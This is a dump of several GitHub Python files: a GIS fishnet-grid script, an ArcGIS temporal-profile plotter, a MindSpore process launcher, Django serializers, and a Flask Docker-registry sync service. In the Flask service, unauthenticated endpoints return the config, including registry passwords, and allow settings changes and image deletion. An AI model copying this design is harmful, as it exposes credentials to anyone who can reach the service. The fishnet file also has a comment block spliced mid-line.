[\"GRS_1980\",6378137.0,298.257222101]],PRIMEM[\"Greenwich\",0.0],UNIT[\"Degree\",0.0174532925199433]],PROJECTION[\"Albers\"],PARAMETER[\"False_Easting\",0.0],\\\n PARAMETER[\"False_Northing\",0.0],PARAMETER[\"Central_Meridian\",-96.0],PARAMETER[\"Standard_Parallel_1\",29.5],PARAMETER[\"Standard_Parallel_2\",45.5],\\\n PARAMETER[\"Latitude_Of_Origin\",37.5],UNIT[\"Meter\",1.0]]'\n\n wgs84 = 'GEOGCS[\"GCS_WGS_1984\",DATUM[\"D_WGS_1984\",SPHEROID[\"WGS_1984\",6378137.0,298.257223563]],PRIMEM[\"Greenwich\",0.0],UNIT[\"Degree\",0.0174532925199433]]'\n\n # grid size in degrees or meters - depending on input projection\n # grid_size = 50000 # this is 5 km\n\n # w, s, e, n = shp.bbox\n w, s, e, n = bbox\n Ys = [i for i in xfrange(s, n, grid_size)]\n Xs = [i for i in xfrange(w, e, grid_size)]\n\n bb_li = []\n row = 0\n col = 0\n for y, y1 in zip(Ys, Ys[1:]):\n row += 1\n for x, x1 in zip(Xs, Xs[1:]):\n col += 1\n bbox = (x, y, x1, y1)\n bb_li.append(bbox)\n\n geoms_to_shp(bb_li, output_name, us_albers_equal_area)\n\n#---------------------------------------------\n##########################\n## Directory Management ##\n##########################\n\ncd = r\"C:\\Users\\joogl\\OneDrive\\Documents\\GIS DataBase\\Retailer_Grid\"\nprefix = \"Tickers_Points_Sub_\"\n\n# loop through directory and identify all shapefiles with \"prefix\"\n# Note: will deprecate this method later and instead create a new attribute ID that delineates region\nsub_files = []\nfor file in os.listdir(cd):\n if file.startswith(prefix):\n if file.endswith(\".shp\"):\n sub_files.append(file)\n\n# ---------------------------------------------\n###################\n## Grid Creation ##\n###################\n\n# For each of these shapefiles, open the shapefile, determine the bounding box extent, and generate a unique\n# fishnet grid\nfor file in sub_files:\n sub_dir = os.path.join(cd, file)\n # instantiate a geopandas df object based on the points subset shapefile\n sub_gdf = geopandas.GeoDataFrame.from_file(sub_dir)\n # instantiate a shapefile object based on the points 
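\n    # Note: create_fishnet() (called at the end of this loop) tiles the bounding\n    # box with xfrange(), which always yields the stop value as well (the\n    # while/else branch above), so the last row/column of cells can be narrower\n    # than grid_size. A small illustration:\n    #   >>> list(xfrange(0.0, 11000.0, 5000.0))\n    #   [0.0, 5000.0, 10000.0, 11000.0]\n    # Each adjacent (x, x1)/(y, y1) pair then becomes one grid cell via box()\n    # inside geoms_to_shp().\n    # instantiate a shapefile object based on the points 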
subset shapefile\n sub_shp = shapefile.Reader(sub_dir)\n # determine the bounding box extent using shapefile\n \"\"\"\n Can easily do this with:\n pyshp, or ogr, or fiona, or geopandas, or by pulling bytes 36 through 60 from the\n header of the actual shapefile (fun fact. the bbox of a shapefile is stored in\n the header of the actual file)\n\n In geopandas:\n geopandas (in_gdf.total_bounds) or bounds of each feature (in_gdf.bounds)\n \"\"\"\n shp_bounds = sub_shp.bbox\n # create an output file name\n # For Slashes Only: m = re.search(r\"\\[([A-Za-z0-9_]+)\\]\", file)\n m = re.search(r\"^[^.]*\", file)\n file_name = m.group(0)\n grid_out = os.path.join(cd, file_name+\"_grid.shp\")\n # # # Create the fishnet # # #\n create_fishnet(shp_bounds, 5000, grid_out)\n\n","repo_name":"jooglyp/code-examples","sub_path":"fishnet-create.py","file_name":"fishnet-create.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33446621638","text":"from ._util import _to_datetime, _datetime2ole, _ole2datetime, _iso_to_datetime, _check_if_iso_format, _time_filter, _linear_regression, _harmonic_regression\nimport datetime as _datetime\nimport logging as _logging\n_LOGGER = _logging.getLogger(__name__)\n\n\ntry:\n import numpy as _np\n import matplotlib.pyplot as _plt\n from matplotlib.pyplot import cm as _cm\n\nexcept:\n raise\n \n \n\ndef temporal_profile(raster, points=[], time_field=None, variables=[], bands=[0], time_extent=None, dimension=None, dimension_values=[], \n show_values=False, trend_type=None, trend_order=None, plot_properties={}):\n\n '''\n A temporal profile serves as a basic analysis tool for imagery data in a time series. \n Visualizing change over time with the temporal profile allows trends to be displayed \n and compared with variables, bands, or values from other dimensions simultaneously.\n\n Using the functionality in temporal profile charts, you can perform trend analysis, gain insight into \n multidimensional raster data at given locations, and plot values that are changing over time \n in the form of a line graph.\n\n Temporal profile charts can be used in various scientific applications involving time series \n analysis of raster data, and the graphical output of results can be used directly as \n input for strategy management and decision making.\n\n The x-axis of the temporal profile displays the time in continuous time intervals. The time field is \n obtained from the timeInfo of the image service.\n \n The y-axis of the temporal profile displays the variable value.\n\n\n ==================================== ====================================================================\n **Argument** **Description**\n ------------------------------------ --------------------------------------------------------------------\n raster Required Imagery Layer object.\n ------------------------------------ --------------------------------------------------------------------\n points Required list of point Geometry objects. \n ------------------------------------ --------------------------------------------------------------------\n time_field Required string. The time field that will be used for plotting \n temporal profile.\n \n If not specified the time field is obtained from the timeInfo of \n the image service.\n ------------------------------------ --------------------------------------------------------------------\n variables Required list of variable names. 
\n For non multidimensional data, the variable would be name of the Sensor.\n To plot the graph against all sensors specify - \"ALL_SENSORS\" \n ------------------------------------ --------------------------------------------------------------------\n bands Optional list of band indices. By default takes the \n first band (band index - 0). \n For a multiband data, you can compare the time change of different \n bands over different locations.\n ------------------------------------ --------------------------------------------------------------------\n time_extent Optional list of date time object. This represents the time extent\n ------------------------------------ --------------------------------------------------------------------\n dimension Optional list of dimension names. This option works specifically on \n multidimensional data containing a time dimension and other dimensions.\n\n The temporal profile is created based on the specific values in other \n dimensions, such as depth at the corresponding time value. For example, \n soil moisture data usually includes both a time dimension and vertical \n dimension below the earth's surface, resulting in a temporal profile \n at 0.1, 0.2, and 0.3 meters below the ground.\n ------------------------------------ --------------------------------------------------------------------\n dimension_values Optional list of dimension values. This parameter can be used to specify\n the values of dimension parameter other than the time dimension (dimension\n name specified using dimension parameter)\n ------------------------------------ --------------------------------------------------------------------\n show_values Optional bool. Default False.\n Set this parameter to True to display the values at each point in the line graph.\n ------------------------------------ --------------------------------------------------------------------\n trend_type Optional string. Default None.\n Set the trend_type parameter eith with linear or harmonic to draw the trend line\n linear : Fits the pixel values for a variable along a linear trend line.\n harmonic : Fits the pixel values for a variable along a harmonic trend line.\n ------------------------------------ --------------------------------------------------------------------\n trend_order optional number. The frequency number to use in the trend fitting. \n This parameter specifies the frequency of cycles in a year. \n The default value is 1, or one harmonic cycle per year.\n\n This parameter is only included in the trend analysis for a harmonic regression.\n ------------------------------------ --------------------------------------------------------------------\n plot_properties Optional dict. This parameter can be used to set the figure \n properties. 
These are the matplotlib.pyplot.figure() parameters and values\n specified in dict format.\n\n eg: {\"figsize\":(15,15)}\n ==================================== ====================================================================\n\n :return:\n None\n\n '''\n \n t1 = []\n\n if not isinstance(variables,list):\n variables= [variables]\n if not isinstance(points,list):\n points= [points]\n if not isinstance(bands,list):\n bands= [bands]\n\n if time_field is None:\n try:\n x_var = raster.properties.timeInfo['startTimeField']\n except:\n raise RuntimeError(\"Specify time_field to plot the temporal profile.\")\n else:\n x_var = time_field\n\n if \"hasMultidimensions\" in raster.properties and \\\n raster.properties['hasMultidimensions'] == True:\n \n mosaic_rule = {\n \"mosaicMethod\" : \"esriMosaicAttribute\",\n \"ascending\" : False,\n \"sortField\": x_var,\n \"multidimensionalDefinition\": [{\n \"variableName\" : \"\",\n \"dimensionName\" : x_var\n }]\n }\n if time_extent is not None:\n if isinstance(time_extent, _datetime.datetime):\n time_extent =[int(time_extent.timestamp() * 1000)]\n elif isinstance(time_extent, list):\n if isinstance(time_extent[0], _datetime.datetime) and isinstance(time_extent[1], _datetime.datetime):\n time_extent = [int(time_extent[0].timestamp() * 1000),\n int(time_extent[1].timestamp() * 1000)]\n for index, each_elem in enumerate(mosaic_rule['multidimensionalDefinition']):\n if mosaic_rule['multidimensionalDefinition'][index]['dimensionName'] == x_var:\n mosaic_rule['multidimensionalDefinition'][index]['values']=[time_extent]\n\n if dimension is not None and dimension_values is not None:\n if not isinstance(dimension_values,list):\n dimension_values = [dimension_values]\n mosaic_rule['multidimensionalDefinition'].append({\n \"variableName\" : \"\",\n \"dimensionName\" : dimension,\n \"values\":dimension_values,\n \"isSlice\":True})\n\n num_lines = len(dimension_values)*len(variables)*len(points)*len(bands)\n y=[[] for i in range(0, num_lines)]\n x=[[] for i in range(0, num_lines)]\n #x_var = raster.properties.timeInfo['startTimeField']\n\n if len(variables)==1:\n variable_unit = None\n for ele in raster.multidimensional_info['multidimensionalInfo']['variables']:\n if(ele['name']==variables[0]):\n if \"unit\" in ele.keys():\n variable_unit = ele['unit']\n break\n res=[]\n t1=[]\n d1=[]\n xx=[]\n yy=[]\n for band in bands:\n for index, point in enumerate(points):\n for variable in variables:\n for md_def in mosaic_rule['multidimensionalDefinition']:\n md_def[\"variableName\"]=variable\n\n res=raster.get_samples(geometry=point, return_first_value_only=False, out_fields=\"*\", mosaic_rule=mosaic_rule)\n\n if dimension_values !=[]:\n for dim_value in dimension_values:\n for res_ele in res:\n if(res_ele['attributes'][dimension]==dim_value):\n yy.append(res_ele['values'][band])\n xx.append(_to_datetime(res_ele['attributes'][x_var]))\n d1.append({\"yy\":yy, \"xx\":xx, \"dimension_value\":dim_value})\n yy=[]\n xx=[]\n \n\n else:\n for ele in res:\n y.append(ele['values'][band])\n x.append(_to_datetime(ele['attributes'][x_var]))\n\n #if \"bandNames\" in raster.properties:\n # band = raster.properties.bandNames[band]\n\n if dimension_values ==[]:\n t1.append({\"y\":y,\n \"x\":x,\n \"point\": index,\n \"variable\":variable,\n \"band\":band})\n else:\n for ele in d1:\n t1.append({\"y\":ele[\"yy\"],\n \"x\":ele[\"xx\"],\n \"point\": index,\n \"variable\":variable,\n \"dimension_value\":ele[\"dimension_value\"],\n \"dimension\":dimension,\n \"band\":band})\n x=[]\n y=[]\n 
d1=[]\n\n        if plot_properties is None:\n            plot_properties = {}\n        if len(plot_properties)==0 or (len(plot_properties)>0 and \"figsize\" not in plot_properties.keys()):\n            plot_properties.update({\"figsize\":(15,15)})\n        if plot_properties is not None and isinstance(plot_properties,dict):\n            #{\"figsize\":(20,10),\"dpi\":100,\"facecolor\":\"yellow\",\"edgecolor\":\"blue\",\"linewidth\":10.0,\"frameon\":False}\n            _plt.figure(**plot_properties)\n        _plt.xlabel(x_var)\n        if len(variables)==1:\n            if variable_unit is not None:\n                _plt.ylabel(variables[0] + ' (in '+variable_unit+')')\n            else:\n                _plt.ylabel(variables[0])\n        else:\n            _plt.ylabel(\"Values\")\n\n        title_string = \"Change in\"\n        for ele in variables:\n            title_string=title_string+\" \"+str(ele+\",\")\n        title_string=title_string+ \" over \"+x_var\n        if dimension is not None and dimension_values is not None:\n            title_string = title_string+ ','' at '+ str(dimension)+' = '+str(dimension_values)\n        _plt.title(title_string)\n\n        color=iter(_cm.rainbow(_np.linspace(0,1,len(t1))))\n        for i in range(0,len(t1)):\n            label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"+ str(t1[i][\"variable\"])\n            if \"dimension\" in t1[i].keys():\n                label_string = label_string+\"-\"+t1[i][\"dimension\"]+\"=\"+str(t1[i][\"dimension_value\"])\n            if \"band\" in t1[i].keys():\n                label_string = label_string+\"-\"+\"band = \"+str(t1[i][\"band\"])\n            c=next(color)\n            _plt.plot(t1[i][\"x\"],t1[i][\"y\"], c=c, label=label_string)\n            _plt.scatter(t1[i][\"x\"],t1[i][\"y\"], c=[c])\n            _plt.legend(loc='upper left')\n\n            #for i in range(0,len(t1)):\n            #    label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"+ str(t1[i][\"variable\"])\n            #    if \"dimension\" in t1[i].keys():\n            #        label_string = label_string+\"-\"+t1[i][\"dimension\"]+\"=\"+str(t1[i][\"dimension_value\"])\n            #    plt.plot(t1[i][\"x\"],t1[i][\"y\"], label=label_string)\n            #    plt.scatter(t1[i][\"x\"],t1[i][\"y\"])\n            #    plt.legend(loc='upper left')\n            #plt.gcf().autofmt_xdate()\n            #print(t1[i][\"x\"],\" < \", t1[i][\"y\"])\n\n            if trend_type is not None:\n                date_list=[]\n                for date in t1[i][\"x\"]:\n                    ole_date = _datetime2ole(date)\n                    date_list.append(ole_date)\n                sample_size = len(date_list)\n                if (sample_size != len(t1[i][\"y\"])):\n                    print(\"error\")\n                if trend_type.lower() == \"linear\":\n                    x_trend, y_trend = _linear_regression(sample_size, date_list, t1[i][\"x\"], t1[i][\"y\"])\n                elif trend_type.lower() == \"harmonic\":\n                    if trend_order is None:\n                        trend_order = 1\n                        _LOGGER.warning(\"trend_order not specified. Setting trend order as 1 to plot the trend line\")\n                    if trend_order < 1:\n                        trend_order = 1\n                        _LOGGER.warning(\"Invalid Argument - trend order is less than 1. Setting trend order as 1 to plot the trend line\")\n                    if trend_order > 3:\n                        trend_order = 3\n                        _LOGGER.warning(\"Invalid Argument - trend order is greater than 3. 
Setting trend order as 3 to plot the trend line\")\n x_trend, y_trend = _harmonic_regression(sample_size, date_list, t1[i][\"x\"], t1[i][\"y\"], trend_order)\n _plt.plot(x_trend, y_trend,\"--g\")\n\n if show_values:\n for x,y in zip(t1[i][\"x\"],t1[i][\"y\"]):\n label = \"{:.2f}\".format(y)\n _plt.annotate(label, # this is the text\n (x,y), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n xytext=(10,5), # distance from text to points (x,y)\n ha='center') \n\n _plt.show()\n #plt.legend()\n else:\n num_lines = len(points)*len(bands)\n #y=[[] for i in range(0, num_lines)]\n #x=[[] for i in range(0, num_lines)]\n t2=[]\n t1=[]\n xx=[]\n yy=[]\n d1=[]\n\n mosaic_rule = {\n \"mosaicMethod\" : \"esriMosaicAttribute\",\n \"ascending\" : False,\n \"sortField\": x_var\n }\n\n for index, point in enumerate(points):\n for variable in variables:\n t2 = raster.get_samples(geometry=point, return_first_value_only=False, out_fields=\"*\" ,mosaic_rule = mosaic_rule)\n #print(t2)\n #x_var = raster.properties.timeInfo['startTimeField']\n \n for band in bands:\n for element in t2: \n if \"attributes\" in element:\n if \"SensorName\" in element[\"attributes\"].keys():\n if variable.upper()==\"ALL_SENSORS\":\n if _time_filter(time_extent, _to_datetime(element[\"attributes\"][x_var])) == True:\n yy.append(element['values'][band])\n xx.append(_to_datetime(element[\"attributes\"][x_var]))\n xx, yy = zip(*sorted(zip(xx, yy)))\n xx=list(xx)\n yy=list(yy)\n if element[\"attributes\"][\"SensorName\"]==variable:\n if _time_filter(time_extent, _to_datetime(element[\"attributes\"][x_var])) == True:\n yy.append(element['values'][band])\n xx.append(_to_datetime(element[\"attributes\"][x_var]))\n xx, yy = zip(*sorted(zip(xx, yy)))\n xx=list(xx)\n yy=list(yy)\n\n d1.append({\"yy\":yy, \"xx\":xx, \"band\":band})\n yy=[]\n xx=[] \n for ele in d1:\n t1.append({\"y\":ele[\"yy\"],\n \"x\":ele[\"xx\"],\n \"point\": index,\n \"variable\" : variable,\n \"band\":ele[\"band\"]})\n d1=[]\n #print(t1)\n if plot_properties is None:\n plot_properties = {}\n if len(plot_properties)==0 or (len(plot_properties)>0 and \"figsize\" not in plot_properties.keys()):\n plot_properties.update({\"figsize\":(15,15)})\n if plot_properties is not None and isinstance(plot_properties,dict):\n #{\"figsize\":(20,10),\"dpi\":100,\"facecolor\":\"yellow\",\"edgecolor\":\"blue\",\"linewidth\":10.0,\"frameon\":False}\n _plt.figure(**plot_properties)\n #_plt.figure(figsize=(15,15))\n #_plt.figure()\n _plt.xlabel(x_var)\n _plt.ylabel(variable)\n if len(variables)==1:\n _plt.ylabel(variables[0])\n else:\n _plt.ylabel(\"Values\")\n title_string = \"Change in\"\n for ele in variables:\n title_string=title_string+\" \"+str(ele+\",\")\n title_string=title_string+ \" over \"+x_var\n _plt.title(title_string)\n color=iter(_cm.rainbow(_np.linspace(0,1,len(t1))))\n for i in range(0,len(t1)):\n label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"+ str(t1[i][\"variable\"])\n #label_string = \"Location \"+ str(t1[i][\"point\"])+\"-\"\n if \"band\" in t1[i].keys():\n label_string = label_string+\"-\"+\"band = \"+str(t1[i][\"band\"])\n c=next(color)\n _plt.plot(t1[i][\"x\"],t1[i][\"y\"], c=c, label=label_string)\n _plt.scatter(t1[i][\"x\"],t1[i][\"y\"], c=[c])\n _plt.legend(loc='upper left')\n \n if show_values:\n for x,y in zip(t1[i][\"x\"],t1[i][\"y\"]):\n label = \"{:.2f}\".format(y)\n _plt.annotate(label, # this is the text\n (x,y), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n 
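# The _linear_regression helper called above isn't shown in this module; this
# is an assumed equivalent using np.polyfit on date serial numbers, with
# toordinal() standing in for the OLE-style numbers from _datetime2ole.
import datetime
import numpy as np

dates = [datetime.datetime(2020, m, 1) for m in (1, 2, 3, 4)]
values = [1.0, 1.8, 3.1, 3.9]

ordinals = [d.toordinal() for d in dates]           # monotone numeric stand-in for OLE dates
slope, intercept = np.polyfit(ordinals, values, 1)  # degree-1 least-squares fit
trend = [slope * o + intercept for o in ordinals]   # y-values of the dashed trend line
print(list(zip(dates, trend)))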
xytext=(10,5), # distance from text to points (x,y)\n ha='center') \n #_plt.gcf().autofmt_xdate()\n _plt.show()\n\n","repo_name":"chrimerss/FloodDetectionUsingSAR","sub_path":"env/lib/python3.6/site-packages/arcgis/raster/_charts.py","file_name":"_charts.py","file_ext":"py","file_size_in_byte":20758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"11525752466","text":"import os\nimport sys\nimport subprocess\nimport shutil\nfrom argparse import ArgumentParser\n\ndef parse_args():\n \"\"\"\n parse args .\n\n Args:\n\n Returns:\n args.\n\n Examples:\n >>> parse_args()\n \"\"\"\n parser = ArgumentParser(description=\"mindspore distributed training launch \"\n \"helper utilty that will spawn up \"\n \"multiple distributed processes\")\n parser.add_argument(\"--nproc_per_node\", type=int, default=1,\n help=\"The number of processes to launch on each node, \"\n \"for D training, this is recommended to be set \"\n \"to the number of D in your system so that \"\n \"each process can be bound to a single D.\")\n parser.add_argument(\"--visible_devices\", type=str, default=\"0,1,2,3,4,5,6,7\",\n help=\"will use the visible devices sequentially\")\n parser.add_argument(\"--training_script\", type=str,\n help=\"The full path to the single D training \"\n \"program/script to be launched in parallel, \"\n \"followed by all the arguments for the \"\n \"training script\")\n # rest from the training program\n args, unknown = parser.parse_known_args()\n args.training_script_args = unknown\n return args\n\n\ndef main():\n print(\"start\", __file__)\n args = parse_args()\n print(args)\n visible_devices = args.visible_devices.split(',')\n assert os.path.isfile(args.training_script)\n assert len(visible_devices) >= args.nproc_per_node\n print('visible_devices:{}'.format(visible_devices))\n\n # spawn the processes\n processes = []\n cmds = []\n log_files = []\n env = os.environ.copy()\n env['RANK_SIZE'] = str(args.nproc_per_node)\n cur_path = os.getcwd()\n for rank_id in range(0, args.nproc_per_node):\n os.chdir(cur_path)\n device_id = visible_devices[rank_id]\n device_dir = os.path.join(cur_path, 'device{}'.format(rank_id))\n env['RANK_ID'] = str(rank_id)\n env['DEVICE_ID'] = str(device_id)\n if os.path.exists(device_dir):\n shutil.rmtree(device_dir)\n os.mkdir(device_dir)\n os.chdir(device_dir)\n cmd = [sys.executable, '-u']\n cmd.append(args.training_script)\n cmd.extend(args.training_script_args)\n log_file = open('{dir}/log{id}.log'.format(dir=device_dir, id=rank_id), 'w')\n process = subprocess.Popen(cmd, stdout=log_file, stderr=log_file, env=env)\n processes.append(process)\n cmds.append(cmd)\n log_files.append(log_file)\n for process, cmd, log_file in zip(processes, cmds, log_files):\n process.wait()\n if process.returncode != 0:\n raise subprocess.CalledProcessError(returncode=process, cmd=cmd)\n log_file.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gerayking/mindsporeAno","sub_path":"model_zoo/official/cv/mobilenetv2/src/launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17702759112","text":"from rest_framework import serializers\nfrom matricula.models import Curso, MatriculaCurso, PeriodoAcademico\nfrom usuarios.serializers import ProfesorSerializer, AlumnoSerializer\nfrom asignaturas.serializers import AsignaturaSerializer\n\n\nclass 
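# Distilled sketch of the launcher pattern in launch.py above: one child
# process per rank, each with its own RANK_ID/DEVICE_ID environment and log
# file, waited on afterwards. "worker.py" is a placeholder script name.
import os
import subprocess
import sys

def launch(nproc, script="worker.py"):
    base_env = os.environ.copy()
    base_env["RANK_SIZE"] = str(nproc)
    procs = []
    for rank in range(nproc):
        env = dict(base_env, RANK_ID=str(rank), DEVICE_ID=str(rank))
        log = open(f"log{rank}.log", "w")
        # -u keeps the child's stdout unbuffered so the logs fill promptly
        procs.append((subprocess.Popen([sys.executable, "-u", script],
                                       stdout=log, stderr=log, env=env), log))
    for proc, log in procs:
        proc.wait()
        log.close()
        if proc.returncode != 0:
            raise RuntimeError(f"rank process failed with {proc.returncode}")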
PeriodoAcademicoSerializer(serializers.ModelSerializer):\n class Meta:\n model = PeriodoAcademico\n fields = ('id',\n 'nombre',\n 'fecha_inicio',\n 'fecha_fin')\n\n\nclass CursoSerializer(serializers.ModelSerializer):\n periodo_academico = PeriodoAcademicoSerializer(read_only=True)\n asignatura = AsignaturaSerializer(read_only=True)\n profesor = ProfesorSerializer(read_only=True)\n\n class Meta:\n model = Curso\n fields = ('id',\n 'grupo',\n 'profesor',\n 'asignatura',\n 'periodo_academico',\n 'cupo')\n\n\nclass CursoSerializerPost(serializers.ModelSerializer):\n\n class Meta:\n model = Curso\n fields = ('id',\n 'grupo',\n 'profesor',\n 'asignatura',\n 'periodo_academico',\n 'cupo')\n\n\nclass MatriculaSerializer(serializers.ModelSerializer):\n curso = CursoSerializer(read_only=True)\n alumno = AlumnoSerializer(read_only=True)\n\n class Meta:\n model = MatriculaCurso\n fields = ('id',\n 'calificacion',\n 'curso',\n 'alumno')\n\n\nclass MatriculaSerializerPost(serializers.ModelSerializer):\n\n class Meta:\n model = MatriculaCurso\n fields = ('id',\n 'calificacion',\n 'curso',\n 'alumno')","repo_name":"eduard-arango11/BackMatricula","sub_path":"matricula/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21627958695","text":"# -*- coding: utf-8 -*-\nimport requests\nimport yaml\nimport json\n\nfrom log import log\nfrom flask import Flask, jsonify, request, send_from_directory\n\nfrom DockerRegistry import DockerRegistry\nfrom DockerClient import DockerClient\n\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)\n\napi = Flask(__name__)\n\n\ndef init_vars():\n global src_reg, dst_reg, docker_cli\n try:\n src_reg = DockerRegistry(cfg['src_registry']['ADDRESS'], cfg['src_registry']['USERNAME'],\n cfg['src_registry']['PASSWORD'])\n dst_reg = DockerRegistry(cfg['dst_registry']['ADDRESS'], cfg['dst_registry']['USERNAME'],\n cfg['dst_registry']['PASSWORD'])\n\n docker_cli = DockerClient()\n docker_cli.login(src_reg.ADDRESS, src_reg.USERNAME, src_reg.PASSWORD)\n docker_cli.login(dst_reg.ADDRESS, dst_reg.USERNAME, dst_reg.PASSWORD)\n except requests.exceptions.RequestException as e:\n print('docker registry connection error', e)\n\n\nsrc_reg = dst_reg = DockerRegistry()\ndocker_cli = DockerClient\n\ninit_vars()\n\n\n@api.route('/', defaults={'path': ''})\n@api.route('/')\ndef get_resource(path):\n if not path or path == 'settings':\n path = 'index.html'\n return send_from_directory('client/build', path)\n\n\n@api.route('/static/js/')\ndef send_js(path):\n return send_from_directory('client/build/static/js', path)\n\n\n@api.route('/static/css/')\ndef send_css(path):\n return send_from_directory('client/build/static/css', path)\n\n\n# http сервис должен уметь:\n# список имеджей на деве\n@api.route('/api/images/src', methods=['GET'])\ndef get_src_images():\n images = src_reg.images_list()\n return jsonify(images)\n\n\n# список имеджей на проде\n@api.route('/api/images/dst', methods=['GET'])\ndef get_dst_images():\n images = dst_reg.images_list()\n return jsonify(images)\n\n\n# перенос с одного сервера на другой\n@api.route('/api/move/to_/', methods=['POST'])\ndef move(server):\n req = request.get_json()\n image = req['image']\n\n pull_server = dst_reg.ADDRESS\n push_server = src_reg.ADDRESS\n if server == 'dst':\n pull_server = src_reg.ADDRESS\n push_server = dst_reg.ADDRESS\n\n src_repo, src_tag = 
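# Minimal sketch of the SPA-serving pattern used by the Flask routes above:
# a catch-all route that falls back to index.html for client-side paths.
# The client/build directory mirrors the snippet; adjust as needed.
from flask import Flask, send_from_directory

app = Flask(__name__)

@app.route("/", defaults={"path": ""})
@app.route("/<path:path>")
def spa(path):
    # Unknown or client-side routes (e.g. /settings) get the SPA entry point.
    if not path or path == "settings":
        path = "index.html"
    return send_from_directory("client/build", path)

if __name__ == "__main__":
    app.run(port=8000)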
image.split(':')\n\n move_image(pull_server, push_server, src_repo, src_tag)\n\n return 'OK'\n\n\ndef move_image(pull_server, push_server, src_repo, src_tag):\n # скачиваем с дева по соурс тегу\n pulled_image_id = docker_cli.pull_image(pull_server, src_repo, src_tag)\n pulled_image = docker_cli.get_image(pulled_image_id)\n\n # меняем в теге урл на прод\n new_tag = src_tag\n new_repo = push_server + '/' + src_repo\n\n pulled_image.tag(repository=new_repo, tag=new_tag)\n\n # пушим на проду\n docker_cli.push_image(new_repo, new_tag)\n\n # удаляем локальный имейдж\n docker_cli.remove_image(pulled_image_id)\n\n\n@api.route('/api/check_if_can_be_removed/', methods=['POST'])\ndef check_if_can_be_removed(server):\n req = request.get_json()\n\n if 'images' not in req \\\n or req['images'].__len__() < 1:\n return ''\n\n docker_reg = src_reg\n if server == 'dst':\n docker_reg = dst_reg\n\n response = {}\n for image in req['images']:\n src_repo, src_tag = image.split(':')\n duplicates = docker_reg.check_if_can_be_removed(src_repo, src_tag)\n if duplicates.__len__() < 1:\n continue\n\n response[image] = duplicates\n\n return jsonify(response)\n\n# удаление с любого из\n@api.route('/api/remove//', methods=['POST'])\ndef remove(server):\n req = request.get_json()\n\n if 'image' not in req or not req['image']:\n return ''\n\n src_image = req['image']\n\n docker_reg = src_reg\n if server == 'dst':\n docker_reg = dst_reg\n\n response = {\n 'status': 'ok'\n }\n\n src_repo, src_tag = src_image.split(':')\n\n result = docker_reg.remove_image(src_repo, src_tag)\n\n if not result:\n response = {\n 'status': 'error',\n }\n\n return jsonify(response)\n\n\ndef filter_tags(images):\n res = list()\n for image_name, tags in images.items():\n if cfg['repositories'].__len__() > 0 \\\n and cfg['repositories'][0] != '' \\\n and image_name not in cfg['repositories']:\n continue\n for prefix in cfg['prefixes']:\n for tag in tags:\n if not tag.startswith(prefix):\n continue\n res.append({\n 'name': image_name,\n 'tag': tag\n })\n\n return res\n\n\n@api.route('/api/get_settings', methods=['GET'])\ndef get_settings():\n return jsonify(cfg)\n\n\n@api.route('/api/save_settings', methods=['POST'])\ndef save_settings():\n new_cfg = request.get_json()\n global cfg\n\n with open(\"config.yml\", 'w+') as cfgfile:\n yaml.dump(new_cfg, cfgfile)\n\n print(log('configs changed, prev configs:'\n + json.dumps(cfg)\n + ', new configs:'\n + json.dumps(new_cfg)))\n\n cfg = new_cfg\n init_vars()\n\n return 'Ok'\n\n\n# метод синхронизации всех докер имеджей\n@api.route('/api/synchronize/', methods=['GET'])\ndef synchronize():\n # получаем список имеджей слева\n src_images = src_reg.images_list()\n # получаем список имеджей справа\n dst_images = dst_reg.images_list()\n # вытаскиваем только нужные, основываясь на префиксах тегов\n src_images = filter_tags(src_images)\n dst_images = filter_tags(dst_images)\n # создаем список лишних на проде\n excess_images = [item for item in dst_images if item not in src_images]\n # сносим лишние\n for excess_image in excess_images:\n dst_reg.remove_image(excess_image['name'], excess_image['tag'])\n\n # создаем список недостающих на проде\n missing_images = [item for item in src_images if item not in dst_images]\n # переносим недостающие\n for missing_image in missing_images:\n move_image(src_reg.ADDRESS, dst_reg.ADDRESS, missing_image['name'], missing_image['tag'])\n\n return 'OK'\n\n\nif __name__ == \"__main__\":\n 
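# Hedged sketch of the pull -> retag -> push -> cleanup sequence in
# move_image() above, written against docker-py directly since the
# DockerClient wrapper's internals aren't shown in this excerpt.
import docker

def move_image(pull_server, push_server, repo, tag):
    client = docker.from_env()
    image = client.images.pull(f"{pull_server}/{repo}", tag=tag)
    new_repo = f"{push_server}/{repo}"
    image.tag(repository=new_repo, tag=tag)      # retag toward the destination registry
    client.images.push(new_repo, tag=tag)        # push under the new name
    client.images.remove(image.id, force=True)   # drop the local copy afterwards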
